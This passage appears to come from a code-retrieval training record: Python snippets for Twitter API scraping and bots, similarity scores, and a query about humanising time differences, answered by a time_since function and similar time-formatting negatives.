searchLimits,\n\t\t\t\t\t\t\tgeocode=geo,\n\t\t\t\t\t\t\tsinceId = sinceId)\n\t\t\t\telse:\n\t\t\t\t\tif (not sinceId):\n\t\t\t\t\t\tnew_tweets = api.search(\n\t\t\t\t\t\t\tq=query, \n\t\t\t\t\t\t\tcount=searchLimits,\n\t\t\t\t\t\t\tgeocode = geo,\n\t\t\t\t\t\t\tmax_id=str(max_id - 1))\n\t\t\t\t\telse:\n\t\t\t\t\t\tnew_tweets = api.search(\n\t\t\t\t\t\t\tq=query, \n\t\t\t\t\t\t\tcount=searchLimits,\n\t\t\t\t\t\t\tgeocode = geo,\n\t\t\t\t\t\t\tmax_id=str(max_id - 1),\n\t\t\t\t\t\t\tsince_id=sinceId)\n\t\t\t\tif not new_tweets:\n\t\t\t\t\tprint(\"NO MORE TWEETS\")\n\t\t\t\t\tfinshed_job = True\n\t\t\t\t\tbreak\n\t\t\t\tfor tweet in new_tweets:\n\t\t\t\t\tif tweet.coordinates or tweet.place:\n\t\t\t\t\t\tjson.dump(tweet._json,f,ensure_ascii=False)\n\t\t\t\t\t\tf.write('\\n')\n\t\t\t\t\n\t\t\t\ttweetsCounts += len(new_tweets)\n\t\t\t\t#print(\"Downloaded {0} tweets\".format(tweetsCounts))\n\t\t\t\tmax_id = new_tweets[-1].id\n\t\t\texcept tweepy.RateLimitError as e:\n\t\t\t\tprint(machine['index'],'Time to sleep 15 mins') \n\t\t\t\tAPI_status[machine['index']] = False\n\t\t\t\tif machine['index'] == 0:\n\t\t\t\t\tAPI_status['time'] = time.time() + 901.00\n\t\t\t\treturn finshed_job,max_id\n\t\t\texcept tweepy.TweepError as e:\n\t\t\t\tlogging.error(str(e))\n\t\t\t\tbreak\n\tf.close()\n\treturn finshed_job,max_id", "def answer_to_tweets(api, tweets):\n\n try:\n last_tweet_id = 0\n for tweet in tweets:\n print(\"Sending an answer to tweet {}: '{}'\".format(tweet[\"id\"],\n tweet[\"text\"]))\n api.statuses.update(status=TARGET_TWEET_ANSWER,\n in_reply_to_status_id=tweet[\"id\"])\n last_tweet_id = tweet[\"id\"]\n time.sleep(1) # do not exceed Twitter limits\n finally:\n update_last_tweet_id(last_tweet_id)", "async def add_tweet(self, tid=None): \n try:\n data=json.loads(self.request.body.decode('utf-8'))\n except: \n print(\"No data body!\")\n\n #print(\"Coordinates: {}\".format(data[\"coordinates\"]))\n if \"place\" in data:\n print(\"Place: {}\".format(data[\"place\"]))\n\n #print(\"User location: {}\".format(data[\"user\"][\"location\"]))\n #print(\"User lang: {}\".format(data[\"user\"][\"lang\"]))\n t=Tweet()\n t.tweet_id = tid\n t = self.fill_tweet(t, data)\n tweet_cache.append(t.to_dict())\n if \"retweeted_status\" in data:\n t.retweeted_status=data[\"retweeted_status\"]\n # \n # save the tweet\n #\n t.upsert()\n #\n # now handle the retweet\n #\n if \"retweeted_status\" in data:\n # this is a retweet so\n # do it once more for the original tweet\n tr=Tweet()\n tr.tweet_id = data[\"retweeted_status\"][\"id_str\"]\n tr = self.fill_tweet(tr, data[\"retweeted_status\"])\n tweet_cache.append(tr.to_dict())\n #tr.upsert()\n #r=requests.get(\"https://publish.twitter.com/oembed?url=https://twitter.com/Interior/status/\"+ t.tweet_id )\n #await self.fire_callbacks(r.json())\n #print(t.to_json(),file=ofile)\n #\n # get the embed html from twitter oembed API\n #\n r=requests.get(\"https://publish.twitter.com/oembed?url=https://twitter.com/Interior/status/\"+ t.tweet_id )\n #print(r.json())\n \n #print(self.__class__.callbacks)\n await self.fire_callbacks(r.json())\n #self.success(message=\"Added tweet id: {} \".format(str(id)), data=t.to_json(), format=\"json\", pure=True)", "def filter(self):\n\t\tparameters = {}\n\n\t\tif self.keywords:\n\t\t\tparameters['track'] = ','.join(self.keywords)\n\n\t\tif self.locations:\n\t\t\tparameters['locations'] = ','.join([','.join([str(latlong) for latlong in loc]) for loc in self.locations])\n\n\t\tif self.usernames:\n\t\t\tparameters['follow'] = ','.join([str(u) for u in self.usernames])\n\n\t\tself.launch('statuses/filter.json', parameters)", "async def _tweets(self, ctx):\n if ctx.invoked_subcommand is None:\n await self.bot.send_cmd_help(ctx)", "def command_tweet(self, bot, update):\n\n bot.sendChatAction(update.message.chat_id, action='typing')\n\n tweet = ext.get_last_tweet(self.config['twitter'])\n\n for url in tweet.get('images', []):\n self.send_photo_url(bot, update, url)\n\n messages = [\n u'{text}',\n '[@{user[screen_name]}](https://twitter.com/{user[screen_name]}) '\n '- {ago}'\n ]\n\n for msg in messages:\n self.send_message(bot, update, msg.format(**tweet))", "def twitter(self):\n message = \"\"\n count = self.collection.count()\n\n twitter = Twitter(auth = OAuth(self.access_key, self.access_secret, self.consumer_key, self.consumer_secret))\n for keyword in self.twitter_keywords:\n query = twitter.search.tweets(q = keyword)\n for result in query['statuses']:\n try:\n data = {\"id\": count+1, \"source\": \"twitter\", \"timestamp\": datetime.now()}\n data['tweet'] = result['text']\n data['name'] = result[\"user\"][\"screen_name\"]\n data['url'] = \"https://twitter.com/\" + data[\"name\"] + \"/status/\" + str(result['id'])\n data['search_string'] = keyword\n try:\n dataid = self.collection.insert(data)\n except DuplicateKeyError as e:\n continue\n count += 1\n\n # Slack push notification\n length = 82 - len(data['url'])\n message += \"\\nURL: \" + data['url'] + \" search string: \".rjust(length) + keyword\n\n except Exception as e:\n print(e)\n pass\n \n if message:\n print(self.G + \"[+] Twitter\" + self.B + message)\n self.message += \"\\n*Twitter*:\\n```\"\n self.message += message\n self.message += \"\\n```\"\n\n return", "def on_error(self, status_code, data):\n logging.warning(\"Error recieving tweet: {0}\".format(status_code))", "def request(self, method, url):\n\t\ttr = TwitterRequest( method.upper(), url )\n\t\treturn self.get_response( tr )", "def __init__(self):\n ### load the json to get twitter config\n # check if the file exists\n if os.path.isfile(CONFIG_FILE):\n tmp_json = json.load(open(CONFIG_FILE))\n # test if tweeting is enabled or not....\n if not tmp_json['twitter']['enable']:\n print(\"We don't want to tweet!\")\n return\n consumer_key = tmp_json['twitter']['consumer_key']\n consumer_secret = tmp_json['twitter']['consumer_secret']\n access_token_key = tmp_json['twitter']['access_token']\n access_token_secret = tmp_json['twitter']['access_token_secret']\n else:\n raise Exception(\"Twitter oauth configuration : unable to open or read file '{0}')\".format(CONFIG_FILE))\n return\n\n ### Connect to twitter\n try:\n self.api = Api(consumer_key = consumer_key,\n consumer_secret = consumer_secret,\n access_token_key = access_token,\n access_token_secret = access_token_secret)\n self.api.VerifyCredentials()\n except TwitterError:\n raise Exception(\"Unable to log in the twitter account : {0}\".format(traceback.format_exc()))" ]
[ "0.6198629", "0.6029169", "0.58477575", "0.5808274", "0.57665455", "0.57665455", "0.5764181", "0.56391084", "0.56317997", "0.5610845", "0.56010497", "0.5593688", "0.559113", "0.5582899", "0.5582899", "0.5582899", "0.5582899", "0.5582672", "0.5578223", "0.55680096", "0.55663747", "0.55476135", "0.5547392", "0.55414146", "0.55348134", "0.55220455", "0.5521493", "0.5501174", "0.54836106", "0.5475972", "0.5474732", "0.54683906", "0.54635406", "0.5460081", "0.54293174", "0.5415793", "0.53823555", "0.5372992", "0.536955", "0.53649145", "0.5360286", "0.5356299", "0.53550434", "0.5338795", "0.53348607", "0.53290105", "0.53199285", "0.53031653", "0.5292702", "0.52920103", "0.5289815", "0.5286423", "0.52830476", "0.5282232", "0.5277615", "0.5267733", "0.5265511", "0.5263746", "0.5256954", "0.52532727", "0.5246086", "0.5243697", "0.5243697", "0.5243697", "0.5237156", "0.52343374", "0.52102304", "0.5208743", "0.5195488", "0.5195032", "0.51932967", "0.5186125", "0.5178335", "0.5168903", "0.5162011", "0.51602584", "0.5160175", "0.5159212", "0.51425445", "0.5141829", "0.5138049", "0.5135707", "0.5123578", "0.5120857", "0.5117346", "0.51158875", "0.5102574", "0.50951135", "0.50897783", "0.5088836", "0.50829667", "0.50808907", "0.50661093", "0.5065631", "0.50600064", "0.5059281", "0.50577325", "0.50560504", "0.50527984", "0.5046081" ]
0.558243
18
Returns a humanized rstring representing time difference between now() and the input timestamp. The output rounds up to days, hours, minutes, or seconds. 4 days 5 hours returns '4 days' 0 days 4 hours 3 minutes returns '4 hours', etc...
def time_since(timestamp=None): rstr = "" if not timestamp or not isinstance(timestamp, datetime.datetime): return rstr now = timezone.now() timediff = now - timestamp days = timediff.days weeks = days//7 months = days//30 minutes = timediff.seconds % 3600 // 60 seconds = timediff.seconds % 3600 % 60 hours = minutes // 60 if days > 365: return "> a year" if months > 0: if months == 1: tstr = "month" else: tstr = "months" rstr = rstr + "%s %s" % (months, tstr) return rstr if weeks > 0: if weeks == 1: tstr = "week" else: tstr = "weeks" rstr = rstr + "%s %s" % (weeks, tstr) return rstr if days > 0: if days == 1: tstr = "day" else: tstr = "days" rstr = rstr + "%s %s" % (days, tstr) return rstr elif hours > 0: if hours == 1: tstr = "hour" else: tstr = "hours" rstr = rstr + "%s %s" % (hours, tstr) return rstr elif minutes > 0: if minutes == 1: tstr = "min" else: tstr = "mins" rstr = rstr + "%s %s" % (minutes, tstr) return rstr elif seconds > 0: if seconds == 1: tstr = "sec" else: tstr = "secs" rstr = rstr + "%s %s" % (seconds, tstr) return rstr else: return "Now"
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def humanize_ts(timestamp=False):\n now = datetime.now()\n diff = now - datetime.fromtimestamp(timestamp)\n second_diff = diff.seconds\n day_diff = diff.days\n\n if day_diff < 0:\n return ''\n\n if day_diff == 0:\n if second_diff < 10:\n return \"just now\"\n if second_diff < 60:\n return str(int(second_diff)) + \" seconds ago\"\n if second_diff < 120:\n return \"a minute ago\"\n if second_diff < 3600:\n return str(int(second_diff / 60)) + \" minutes ago\"\n if second_diff < 7200:\n return \"an hour ago\"\n if second_diff < 86400:\n return str(int(second_diff / 3600)) + \" hours ago\"\n if day_diff == 1:\n return \"Yesterday\"\n if day_diff < 7:\n return str(day_diff) + \" days ago\"\n if day_diff < 31:\n return str(int(day_diff / 7)) + \" weeks ago\"\n if day_diff < 365:\n return str(int(day_diff / 30)) + \" months ago\"\n return str(int(day_diff / 365)) + \" years ago\"", "def get_formatted_duration(self, prev_time):\n duration = time() - prev_time\n if duration < 60:\n unit = 's'\n elif duration < 3600:\n duration /= 60\n unit = 'm'\n else:\n duration /= 3600\n unit = 'h'\n return self.format_num(duration) + unit", "def get_elapsed_timestamp(self) -> str:\n t = self.elapsed_time\n minutes = int(t / 60)\n seconds = int(t - (60 * minutes))\n millis = int(100 * (t - int(t)))\n return '{:>02d}:{:>02d}.{:<02d}'.format(minutes, seconds, millis)", "def get_answer_time(self):\n sec = (self.updated_at - self.created_at).total_seconds()\n return f'{int((sec / 60) % 60):02d}:{int(sec):02d}'", "def time_since_as_text(time=False):\n now = datetime.now(timezone.utc)\n if type(time) is int:\n diff = now - datetime.fromtimestamp(time)\n elif isinstance(time,datetime):\n diff = now - time\n elif not time:\n diff = now - now\n second_diff = diff.seconds\n day_diff = diff.days\n\n if day_diff < 0:\n return ''\n\n if day_diff == 0:\n if second_diff < 10:\n return \"nyss\"\n if second_diff < 60:\n return str(second_diff) + \" sekunder sedan\"\n if second_diff < 120:\n return \"a minute ago\"\n if second_diff < 3600:\n return str(floor(second_diff / 60)) + \" minuter sedan\"\n if second_diff < 7200:\n return \"en timme sedan\"\n if second_diff < 86400:\n return str(floor(second_diff / 3600)) + \" timmar sedan\"\n if day_diff == 1:\n return \"Igår\"\n if day_diff < 7:\n return str(day_diff) + \" dagar sedan\"\n if day_diff < 31:\n return str(floor(day_diff / 7)) + \" veckor sedan\"\n if day_diff < 365:\n return str(floor(day_diff / 30)) + \" månder sedan\"\n return str(day_diff / 365) + \" år sedan\"", "def get_formatted_time() -> datetime.strftime:\n\t\n\tnow = datetime.now() # time now\n\thalf_hour = (now - timedelta(minutes = 30)) # time 30 min ago\n\t# returns half hour ago to accommodate for failed checks\n\t# (bc twint behaves as if none found if check failed)\n\tcurrent_time = half_hour.strftime(\"%Y-%m-%d %H:%M:%S\")\n\treturn current_time", "def _time_delta_from_info(info):\n now = datetime.datetime.now()\n then = info.start_time\n return str(now.replace(microsecond=0) - then.replace(microsecond=0))", "def pretty_date(time=False):\n now = datetime.now()\n if type(time) is int:\n diff = now - datetime.fromtimestamp(time)\n elif isinstance(time, datetime):\n diff = now - time\n elif not time:\n diff = now - now\n else:\n diff = now - now\n second_diff = diff.seconds\n day_diff = diff.days\n\n if day_diff < 0:\n return ''\n\n if day_diff == 0:\n if second_diff < 10:\n return \"just now\"\n if second_diff < 60:\n return str(int(round(second_diff, 0))) + \" seconds ago\"\n if second_diff < 120:\n return \"a minute ago\"\n if second_diff < 3600:\n return str(int(round(second_diff / 60, 0))) + \" minutes ago\"\n if second_diff < 7200:\n return \"an hour ago\"\n if second_diff < 86400:\n return str(int(round(second_diff / 3600, 0))) + \" hours ago\"\n if day_diff == 1:\n return \"Yesterday\"\n if day_diff < 7:\n return str(int(round(day_diff, 0))) + \" days ago\"\n if day_diff < 31:\n return str(int(round(day_diff / 7, 0))) + \" weeks ago\"\n if day_diff < 365:\n return str(int(round(day_diff / 30, 0))) + \" months ago\"\n return str(int(round(day_diff / 365, 0))) + \" years ago\"", "def get_time():\n ct = time.time()\n lt = time.gmtime(ct)\n msec = int((ct - int(ct)) * 1000)\n return f'{time.strftime(DATE_FMT, lt)}.{msec:0>3}'", "def _getUpTime(self):\n diff = (datetime.datetime.now() - self._startTime).__str__()\n return diff[:diff.find('.')]", "def pretty_date(time=False):\n from datetime import datetime\n\n now = datetime.now()\n if type(time) is int:\n diff = now - datetime.fromtimestamp(time)\n elif isinstance(time, datetime):\n diff = now - time\n elif not time:\n diff = now - now\n second_diff = diff.seconds\n day_diff = diff.days\n\n if day_diff < 0:\n return \"\"\n\n if day_diff == 0:\n if second_diff < 10:\n return \"just now\"\n if second_diff < 60:\n return str(second_diff) + \" seconds ago\"\n if second_diff < 120:\n return \"a minute ago\"\n if second_diff < 3600:\n return str(second_diff / 60) + \" minutes ago\"\n if second_diff < 7200:\n return \"an hour ago\"\n if second_diff < 86400:\n return str(second_diff / 3600) + \" hours ago\"\n if day_diff == 1:\n return \"Yesterday\"\n if day_diff < 7:\n return str(day_diff) + \" days ago\"\n if day_diff < 31:\n return str(day_diff / 7) + \" weeks ago\"\n if day_diff < 365:\n return str(day_diff / 30) + \" months ago\"\n return str(day_diff / 365) + \" years ago\"", "def pretty_date(time=False):\n from datetime import datetime\n now = datetime.now()\n if type(time) is int:\n diff = now - datetime.fromtimestamp(time)\n elif isinstance(time,datetime):\n diff = now - time \n elif not time:\n diff = now - now\n second_diff = diff.seconds\n day_diff = diff.days\n\n if day_diff < 0:\n return ''\n\n if day_diff == 0:\n if second_diff < 10:\n return \"just now\"\n if second_diff < 60:\n return str(second_diff) + \" seconds ago\"\n if second_diff < 120:\n return \"a minute ago\"\n if second_diff < 3600:\n return str( second_diff / 60 ) + \" minutes ago\"\n if second_diff < 7200:\n return \"an hour ago\"\n if second_diff < 86400:\n return str( second_diff / 3600 ) + \" hours ago\"\n if day_diff == 1:\n return \"Yesterday\"\n if day_diff < 7:\n return str(day_diff) + \" days ago\"\n if day_diff < 31:\n return str(day_diff/7) + \" weeks ago\"\n if day_diff < 365:\n return str(day_diff/30) + \" months ago\"\n return str(day_diff/365) + \" years ago\"", "def pretty_deltat(seconds: float) -> str:\n\n # Reject weird stuff\n try:\n seconds = float(seconds)\n except (TypeError, ValueError):\n raise TypeError(\"non-numeric time delta\")\n\n if seconds < 0:\n # If the delta is negative, just print it\n return f\"{seconds:.1f}s\"\n\n hours, seconds = divmod(seconds, 3600)\n minutes, seconds = divmod(seconds, 60)\n\n if hours > 0:\n return f\"{int(hours)}h{int(minutes):02}m{int(seconds):02}s\"\n if minutes > 0:\n return f\"{int(minutes)}m{int(seconds):02}s\"\n\n # For short durations, include tenths of a second\n return f\"{seconds:.1f}s\"", "def realtime_to_ingame_delta_formatted(sec: float) -> str:\n return ingame_delta_formatted(realtime_to_ingame_delta(sec))", "def howLongAgo(time=False):\n now = timezone.now()\n if type(time) is int:\n diff = now - datetime.fromtimestamp(time)\n elif isinstance(time,datetime):\n diff = now - time\n elif not time:\n diff = now - now\n second_diff = diff.seconds\n day_diff = diff.days\n\n if day_diff < 0:\n return ''\n\n if day_diff == 0:\n if second_diff < 10:\n return \"genau jetzt\"\n if second_diff < 60:\n return \"vor \" + str(second_diff) + \" Sek.\"\n if second_diff < 120:\n return \"vor einer Min.\"\n if second_diff < 3600:\n return \"vor \" + str( second_diff / 60 ) + \" Min.\"\n if second_diff < 7200:\n return \"vor einer St.\"\n if second_diff < 86400:\n return \"vor \" + str( second_diff / 3600 ) + \" St.\"\n if day_diff == 1:\n return \"Gestern\"\n if day_diff < 7:\n return \"vor \" + str(day_diff) + \" Tagen\"\n if day_diff < 31:\n return \"vor \" + str(day_diff/7) + \" Wochen\"\n if day_diff < 365:\n return \"vor \" + str(day_diff/30) + \" Monaten\"\n return \"vor \" + str(day_diff/365) + \" Jahren\"", "def ago(self):\n return human(self.timestamp/1000.0, precision=1, abbreviate=True)", "def time_elapsed(sec):\n if sec < 60:\n return str(sec) + \" sec\"\n elif sec < (60 * 60):\n return str(sec / 60) + \" min\"\n else:\n return str(sec / (60 * 60)) + \" hr\"", "def _get_time_since_tell_send(tell):\n tell_time_sent = int(tell[3])\n\n current_time = int(time.time())\n\n dt1 = datetime.fromtimestamp(tell_time_sent)\n dt2 = datetime.fromtimestamp(current_time)\n rd = dateutil.relativedelta.relativedelta(dt2, dt1)\n\n out = ''\n\n if rd.days == 1:\n out += f'{rd.days} day, '\n elif rd.days != 0:\n out += f'{rd.days} days, '\n\n if rd.hours == 1:\n out += f'{rd.hours} hour, '\n elif rd.hours != 0:\n out += f'{rd.hours} hours, '\n\n if rd.minutes == 1:\n out += f'{rd.minutes} minute and '\n elif rd.minutes != 0:\n out += f'{rd.minutes} minutes and '\n\n if rd.seconds == 1:\n out += f'{rd.seconds} second ago'\n elif rd.seconds != 0:\n out += f'{rd.seconds} seconds ago'\n elif current_time - tell_time_sent == 0:\n out = 'just now'\n\n return out", "def make_it_rw(time_stamp):\r\n seconds, milliseconds = divmod(int(time_stamp), 1000)\r\n minutes, seconds = divmod(seconds, 60)\r\n hours, minutes = divmod(minutes, 60)\r\n days, hours = divmod(hours, 24)\r\n tmp = (\r\n ((str(days) + \" Days, \") if days else \"\")\r\n + ((str(hours) + \" Hours, \") if hours else \"\")\r\n + ((str(minutes) + \" Minutes, \") if minutes else \"\")\r\n + ((str(seconds) + \" Seconds, \") if seconds else \"\")\r\n + ((str(milliseconds) + \" ms, \") if milliseconds else \"\")\r\n )\r\n return tmp[:-2]", "def unixTimeToString_NEW(ut):\n intTime = int(ut)\n frac = ut - intTime\n #print \"\\nfrac is %f, conv is %f\" % (frac, round(frac*1000))\n y, m, d, ho, mi, se, junk1, junk2, junk3 = gmtime(intTime)\n #print \"ut is %f, s is %4d_%02d_%02d_%02d_%02d_%02d.%03d\\n\" % (ut, y, m, d, ho, mi, se, int(frac*1000))\n #return '%4d_%02d_%02d_%02d_%02d_%02d.%03d' % (y, m, d, ho, mi, se, int(frac*1000))\n return '%4d_%02d_%02d_%02d_%02d_%02d.%03d' % (y, m, d, ho, mi, se, round(frac*1000))", "def elapsed_time_formatted(begin_time):\n return time.strftime(\n \"%H:%M:%S\", (time.gmtime(time.perf_counter() - begin_time))\n )", "def start_delta_string(self):\r\n delta = int(self.start_time) - int(self.root().start_time)\r\n return '%02d:%02d' % (delta / 60, delta % 60)", "def humantime(seconds: float) -> str:\n return redivmod(seconds, [(60, \"seconds\"),\n (60, \"minutes\"),\n (24, \"hours\"),\n (7, \"days\"),\n (52, \"weeks\"),\n (0, \"years\")])", "def pretty_date(time=False):\n now = datetime.datetime.utcnow()\n if type(time) is int:\n diff = now - datetime.datetime.fromtimestamp(time)\n elif isinstance(time, datetime.datetime):\n diff = now - time\n elif not time:\n diff = now - now\n second_diff = diff.seconds\n day_diff = diff.days\n\n if day_diff < 0:\n day_diff *= -1\n second_diff *= -1\n if day_diff < 1:\n if second_diff < 10:\n return ugettext('imminently')\n if second_diff < 60:\n return ungettext('{n} second from now', '{n} seconds from now', second_diff).format(n=second_diff)\n if second_diff < 120:\n return ugettext('in a minute')\n if second_diff < 3600:\n return ungettext('{n} minute from now', '{n} minutes from now', second_diff / 60).format(n=second_diff / 60)\n if second_diff < 7200:\n return ugettext('in an hour')\n if second_diff < 86400:\n return ungettext('{n} hour from now', '{n} hours from now', second_diff / 3600).format(n=second_diff / 3600)\n if day_diff == 1:\n return ugettext('tomorrow')\n if day_diff < 7:\n return ungettext('{n} day from now', '{n} days from now', day_diff).format(n=day_diff)\n if day_diff < 31:\n return ungettext('{n} week from now', '{n} weeks from now', day_diff / 7).format(n=day_diff / 7)\n if day_diff < 365:\n return ungettext('{n} month from now', '{n} months from now', day_diff / 30).format(n=day_diff / 30)\n return ungettext('{n} year from now', '{n} years from now', day_diff / 365).format(n=day_diff / 365)\n\n if day_diff == 0:\n if second_diff < 10:\n return ugettext('just now')\n if second_diff < 60:\n return ungettext('{n} second ago', '{n} seconds ago', second_diff).format(n=second_diff)\n if second_diff < 120:\n return ugettext('a minute ago')\n if second_diff < 3600:\n return ungettext('{n} minute ago', '{n} minutes ago', second_diff / 60).format(n=second_diff / 60)\n if second_diff < 7200:\n return ugettext('an hour ago')\n if second_diff < 86400:\n return ungettext('{n} hour ago', '{n} hours ago', second_diff / 3600).format(n=second_diff / 3600)\n if day_diff == 1:\n return ugettext('yesterday')\n if day_diff < 7:\n return ungettext('{n} day ago', '{n} days ago', day_diff).format(n=day_diff)\n if day_diff < 31:\n return ungettext('{n} week ago', '{n} weeks ago', day_diff / 7).format(n=day_diff / 7)\n if day_diff < 365:\n return ungettext('{n} month ago', '{n} months ago', day_diff / 30).format(n=day_diff / 30)\n return ungettext('{n} year ago', '{n} years ago', day_diff / 365).format(n=day_diff / 365)", "def get_duration_string(duration):\n\n minutes = duration // 60\n seconds = duration % 60\n return \"the game took {} minutes and {} seconds\".format(minutes, seconds)", "def pretty_date(time=False):\r\n from datetime import datetime\r\n import dateutil.parser\r\n now = datetime.now()\r\n if type(time) is str or type(time) is unicode:\r\n time = dateutil.parser.parse(time)\r\n if type(time) is int:\r\n diff = now - datetime.fromtimestamp(time)\r\n elif isinstance(time, datetime):\r\n diff = now - time\r\n elif not time:\r\n diff = now - now\r\n second_diff = diff.seconds\r\n day_diff = diff.days\r\n\r\n if day_diff < 0:\r\n return ''\r\n\r\n if day_diff == 0:\r\n if second_diff < 10:\r\n return \"just now\"\r\n if second_diff < 60:\r\n return str(second_diff) + \" seconds ago\"\r\n if second_diff < 120:\r\n return \"a minute ago\"\r\n if second_diff < 3600:\r\n return ' '.join([str(second_diff / 60), \"minutes ago\"])\r\n if second_diff < 7200:\r\n return \"an hour ago\"\r\n if second_diff < 86400:\r\n return ' '.join([str(second_diff / 3600), \"hours ago\"])\r\n if day_diff == 1:\r\n return \"Yesterday\"\r\n if day_diff < 7:\r\n return ' '.join([str(day_diff), \"days ago\"])\r\n if day_diff < 31:\r\n return ' '.join([str(day_diff / 7), \"weeks ago\"])\r\n if day_diff < 60:\r\n return ' '.join([str(day_diff / 30), \"month ago\"])\r\n if day_diff < 365:\r\n return ' '.join([str(day_diff / 30), \"months ago\"])\r\n if day_diff < (365 * 2):\r\n return ' '.join([str(day_diff / 365), \"year ago\"])\r\n return ' '.join([str(day_diff / 365), \"years ago\"])", "def time_str(num):\n if num > 3600:\n return \"%0.2f hrs\" % (num / 3600)\n elif num > 60:\n return \"%0.2f mins\" % (num / 60)\n else:\n return \"%d seconds\" % num", "def srt(self):\n return '{:02d}:{:02d}:{:02d},{:03d}'.format(self.hours, self.minutes,\n int(self.seconds // 1),\n int(self.seconds % 1 * 100))", "def age(self) -> str:\n tdelta = dt.now() - self.created_timestamp\n if tdelta.days >= 548: # enough to round it up to 2 years\n return f'about {tdelta.days/365:.0f} years'\n elif tdelta.days >= 345: # enough to round it up to 1 year (so it doesn't report '12 months')\n return f'about a year'\n elif tdelta.days > 45: # beyond 1 month (after rounding)\n return f'about {tdelta.days/30:.0f} months'\n elif tdelta.days > 24: # enough to round it up to 1 month (so it doesn't report '4 weeks')\n return f'about a month'\n elif tdelta.days > 7:\n # round to nearest half, dropping '.0' when whole\n return f'{round((tdelta.days/7)*2)/2:g} weeks'\n elif tdelta.days == 7:\n return 'a week'\n elif tdelta.days > 1:\n return f'{tdelta.days} days'\n elif tdelta.days == 1:\n return f'a day'\n # break it down into parts of a day\n hours = tdelta.seconds // 3600\n if hours > 1:\n return f'{hours:.0f} hours'\n elif hours == 1:\n return f'an hour'\n minutes = tdelta.seconds % 3600 / 60\n if minutes > 1:\n return f'{minutes:.0f} minutes'\n elif minutes == 1:\n return f'a minute'\n return 'moments'", "def seconds2human(self, my_time):\n my_days, my_seconds = divmod(my_time, 86400)\n time_delta = timedelta(seconds=my_seconds)\n reminder = strftime(\"%H:%M:%S\", gmtime(time_delta.seconds))\n if my_days > 1:\n return \"%s days, %s\" % (my_days, reminder)\n elif my_days == 1:\n return \"%s day, %s\" % (my_days, reminder)\n else:\n return strftime(\"%H:%M:%S\", gmtime(time_delta.seconds))", "def get_human_readable_time(seconds):\n start_time = time.time()\n timestring = ''\n remainder = seconds\n\n days = int(remainder // (60*60*24))\n remainder -= days*60*60*24\n\n hours = int(remainder // (60*60))\n remainder -= hours*60*60\n\n minutes = int(remainder // 60)\n remainder -= minutes*60\n\n secs = round(remainder, 2)\n \n timestring = \"{} minutes and {} seconds\".format(minutes, secs)\n if hours > 0:\n timestring = \"{} hours, \".format(hours) + timestring\n if days > 0:\n timestring = \"{} days, \".format(days) + timestring\n\n return timestring", "def elapsed(t1, t2):\n # Use the timedelta's standard formatting, except discard microseconds.\n retval = str(t2 - t1)\n m = re.match(r\"([^.]+)\\.([0-9]+)\", retval)\n if m:\n retval = m.group(1)\n return retval", "def format_elapsed_time(seconds):\n minutes = int(round(seconds / 60))\n hours, minutes = divmod(minutes, 60)\n result = '{minutes}m'.format(minutes=minutes)\n\n if hours:\n days, hours = divmod(hours, 24)\n result = '{hours}h {prev}'.format(hours=hours, prev=result)\n\n if days:\n result = '{days}d {prev}'.format(days=days, prev=result)\n\n return result", "def get_timestamp(self, day_diff=0):\n diff = datetime.timedelta(days=day_diff)\n now = datetime.datetime.now() - diff\n return now.strftime('%Y')+'-'+now.strftime('%m')+'-'+now.strftime('%d')+'T'+now.strftime('%H')+':'+now.strftime('%M')+':'+now.strftime('%S')", "def elapsed(timestamp):\n return repoze.timeago.get_elapsed(timestamp)", "def elapsed_human(self):\n intervals = (\n ('weeks', 604800),\n ('days', 86400),\n ('hours', 3600),\n ('mins', 60),\n ('secs', 1),\n )\n seconds = self.elapsed\n result = []\n for name, count in intervals:\n value = int(seconds // count)\n if value:\n seconds -= value * count\n if value == 1:\n name = name.rstrip('s')\n result.append(\"{} {}\".format(value, name))\n return ', '.join(result)", "def format_seconds(s):\n return '%dh %dm' % (s//3600, (s//60) % 60)", "def _format_time(seconds):\n hrs = seconds // 3600\n seconds -= 3600 * hrs\n mins = seconds // 60\n seconds -= 60 * mins\n return '%02dh%02dm%02ds' % (hrs, mins, seconds)", "def get_timestamp():\n now, s=get_date()\n return (now, \"%s%s%s%s\" % (s, str(now.hour).zfill(2), str(now.minute).zfill(2), str(now.second).zfill(2)))", "def printTime(t):\n if t < 2 * MINUTE:\n return \"%d seconds\" % (t / SECOND)\n if t < 5 * HOUR:\n return \"%d minutes\" % (t / MINUTE)\n if t < 3 * DAY:\n return \"%d hours\" % (t / HOUR)\n if t < YEAR:\n return \"%d days\" % (t / DAY)\n if (t % YEAR) == 0:\n return \"%d years\" % (t / YEAR)\n else:\n return \"%5.1f years\" % (t / YEAR)", "async def humanize_time(self, value):\n if value is None:\n return \"None\"\n return str(datetime.timedelta(seconds=value))", "def get_time(self):\n x = time.localtime()\n return ''.join([\n str(x[0]).rjust(4, '0'), '/', str(x[1]).rjust(2, '0'), '/',\n str(x[2]).rjust(2, '0'), ' ', str(x[3]).rjust(2, '0'), ':',\n str(x[4]).rjust(2, '0'), ':', str(x[5]).rjust(2, '0')])", "def humanize_time(seconds):\n seconds = abs(seconds)\n minutes, seconds = divmod(seconds, 60)\n hours, minutes = divmod(minutes, 60)\n days, hours = divmod(hours, 24)\n weeks, days = divmod(days, 7)\n\n seconds = int(seconds)\n minutes = int(minutes)\n hours = int(hours)\n days = int(days)\n weeks = int(weeks)\n\n output = []\n\n if weeks:\n output.append(\"{:02d} weeks\".format(weeks))\n if days:\n output.append(\"{:02d} days\".format(days))\n if hours:\n output.append(\"{:02d} hours\".format(hours))\n if minutes:\n output.append(\"{:02d} minutes\".format(minutes))\n\n output.append(\"{:02d} seconds\".format(seconds))\n\n return \" \".join(output)", "def track_length_string(length):\n return str(timedelta(microseconds=length))", "def now_short(_format=\"%Y%m%d-%H%M%S\"):\n timeString = time.strftime(_format, time.localtime()) + \"\\t\"\n return timeString", "def readable_timedelta(timedeltaobj):\n # stolen from https://stackoverflow.com/a/46928226/8207\n if not timedeltaobj:\n return '---'\n secs = timedeltaobj.total_seconds()\n timetot = \"\"\n if secs > 86400: # 60sec * 60min * 24hrs\n days = secs // 86400\n timetot += \"{} days\".format(int(days))\n secs = secs - days * 86400\n\n if secs > 3600:\n hrs = secs // 3600\n timetot += \" {} hours\".format(int(hrs))\n secs = secs - hrs * 3600\n\n if secs > 60:\n mins = secs // 60\n timetot += \" {} minutes\".format(int(mins))\n secs = secs - mins * 60\n\n if secs > 0:\n timetot += \" {} seconds\".format(int(secs))\n return timetot", "def human_timedelta(delta):\n 